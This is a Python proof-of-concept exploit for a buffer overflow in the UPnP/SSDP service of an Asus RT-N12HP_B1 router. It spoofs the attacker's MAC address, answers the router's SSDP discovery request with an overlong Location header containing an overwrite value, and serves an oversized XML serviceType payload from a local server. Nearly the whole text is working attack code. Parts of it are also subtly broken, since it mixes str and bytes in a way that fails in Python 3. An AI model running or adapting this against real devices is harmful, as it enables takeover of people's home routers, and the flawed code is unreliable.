Asus_serviceTypeCopyOverflow

# Tested product and firmware version: # RT-N12HP_B1 (3.0.0.4.380.3479) # coding=utf-8 ROUTER_IP = '192.168.2.1' #asus wireless router ip IP = '192.168.2.31' #attacker ip INTERACE = 'eth0' #attacker host network interface import time import socket import sys import os import threading import socketserver sc = '<?xml>' sc += '<serviceType>' sc += b'AAAA' * 49 sc += 'AA<></root>' def mac(): os.system('macchanger -A {}'.format(INTERACE)) os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP)) class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler): def handle(self): print('[-] got xml request') self.request.recv(1024) print("[-] sending xml") self.request.send(sc) class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass socketserver.TCPServer.allow_reuse_address = True server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler) t = threading.Thread(target=server.serve_forever) t.start() print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction") addrinfo = socket.getaddrinfo('239.255.255.250', None)[0] s = socket.socket(addrinfo[0], socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('239.255.255.250', 1900)) s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0')) mac() times = 0 state = 'Overflow' while True: data, sender = s.recvfrom(1500) if sender[0] == ROUTER_IP and sender[1] == 1008: print("[-] received SSDP M-SEARCH Package") data = {} data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/' + 'B'*231 + b'\xe0\xbb\x41:' + '\r\n\r\n' sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) sock.sendto(data[state], sender) if state == 'Overflow': print("[-] Send the GetXmlRequest to router") time.sleep(20) os._exit(0)